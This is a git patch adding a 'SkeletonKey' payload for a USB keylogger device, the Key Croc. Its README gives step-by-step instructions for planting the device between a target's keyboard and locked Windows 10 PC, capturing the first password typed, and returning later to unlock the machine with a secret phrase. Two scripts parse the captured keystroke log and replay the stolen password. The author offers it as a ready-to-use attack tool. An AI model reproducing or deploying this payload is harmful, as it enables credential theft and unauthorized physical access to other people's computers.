From f28ec4fd744ce17c79b95de16277ac9887b1f282 Mon Sep 17 00:00:00 2001 From: saintcrossbow Date: Thu, 11 Jun 2020 20:37:15 -0400 Subject: [PATCH] Initial Put An awesome payload if I do say so myself - makes you look like Hollywood hacker --- library/credentials/SkeletonKey/README.md | 40 +++++++++++++++++++ .../credentials/SkeletonKey/skeletonagain.txt | 15 +++++++ .../credentials/SkeletonKey/skeletonkey.txt | 15 +++++++ 3 files changed, 70 insertions(+) create mode 100644 library/credentials/SkeletonKey/README.md create mode 100644 library/credentials/SkeletonKey/skeletonagain.txt create mode 100644 library/credentials/SkeletonKey/skeletonkey.txt diff --git a/library/credentials/SkeletonKey/README.md b/library/credentials/SkeletonKey/README.md new file mode 100644 index 0000000..4b7ca39 --- /dev/null +++ b/library/credentials/SkeletonKey/README.md @@ -0,0 +1,40 @@ +# Skeleton Key +### Deploy to target, come back later to unlock automatically - no checking of logs necessary +--- +Arm the Key Croc with an automatic lockpick for Windows 10! After preparing the Key Croc for deployment, place it on a target with a lock screen. Once the target unlocks the PC, their first entry into the Key Croc will be their password. The Skeleton Key payload listens for your secret command, and then unlocks the computer automatically with that password. + +Like most skeleton keys, this will not be 100% reliable. The target may enter in the wrong password, or maybe drum on the keys before logging in. + +The payload was tested on Windows 10 for both PIN and passwords. + +*Setup* +1. Connect the Key Croc and place into arming mode +2. Save offline and then delete all logs in the loot directory +3. Place both the `skeletonkey.txt` and `skeletonagain.txt` in the payloads directory +4. Optionally change the MATCH string to a unique passphrase of your choice +5. Eject the Key Croc safely + +The Key Croc is ready for deployment. + +*Deploy* +1. Ensure the target is on a lock screen +2. Remove target keyboard, place the Key Croc on the USB, and connect keyboard to Key Croc when LED is white +3. Cross your fingers and leave + +*Turn Skeleton Key* +You get two shots at it! Afterwards, just analyze the log file. +1. Do not disconnect the Key Croc +2. Enter an incorrect password so you receive "The PIN / password is incorrect - try again" message with the OK button. _Do not click the OK button_ - instead... +3. Type the secret phrase `skeletonknock` +4. Didn't work? They may have used the mouse to get to the password screen. Repeat step #2 and then try `skeletonagain` +5. Still no luck? Looks like it isn't your day, but next time you should have better luck. Open the log on a different PC or via SSH to get the password. + +*Now* remove the Key Croc and be on your merry way + +*Why SkeletonKnock? I thought this was called _skeleton key_* +You're right! But I thought it less likely for anyone to type `skeletonknock`. + +*What’s up with the name SaintCrossbow?* +Most of it is because it wasn’t taken. Other than that, I’m a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just can’t help but think that crossbows are cool. + + diff --git a/library/credentials/SkeletonKey/skeletonagain.txt b/library/credentials/SkeletonKey/skeletonagain.txt new file mode 100644 index 0000000..84a6843 --- /dev/null +++ b/library/credentials/SkeletonKey/skeletonagain.txt @@ -0,0 +1,15 @@ +# Title: SkeletonAgain +# Description: Plays back last likely password - this time assuming logged in with mouse +# Author: SaintCrossbow +# Version: 1.0 +# Category: Bypass +# +# Usage: Enter an invalid key, press enter, type "skeletonagain" to enter the last password +MATCH skeletonagain +QUACK ENTER +QUACK ESCAPE +QUACK ESCAPE +QUACK ESCAPE +QUACK ESCAPE +QUACK STRING $(cat /root/loot/croc_char.log | sed 's/[[]ENTER[]]/ꬾ/g' | sed -e 's/\[[^][]*\]//g' | head -c 25 | awk -F 'ꬾ' '{print $1}') +QUACK ENTER \ No newline at end of file diff --git a/library/credentials/SkeletonKey/skeletonkey.txt b/library/credentials/SkeletonKey/skeletonkey.txt new file mode 100644 index 0000000..2b147fa --- /dev/null +++ b/library/credentials/SkeletonKey/skeletonkey.txt @@ -0,0 +1,15 @@ +# Title: SkeletonKey +# Description: Plays back last likely password +# Author: SaintCrossbow +# Version: 1.0 +# Category: Bypass +# +# Usage: Enter an invalid key, press enter, type "skeletonknock" to enter the last password +MATCH skeletonknock +QUACK ENTER +QUACK ESCAPE +QUACK ESCAPE +QUACK ESCAPE +QUACK ESCAPE +QUACK STRING $(cat /root/loot/croc_char.log | sed 's/[[]ENTER[]]/ꬾ/g' | sed -e 's/\[[^][]*\]//g' | head -c 26 | tail -c 25 | awk -F 'ꬾ' '{print $1}') +QUACK ENTER \ No newline at end of file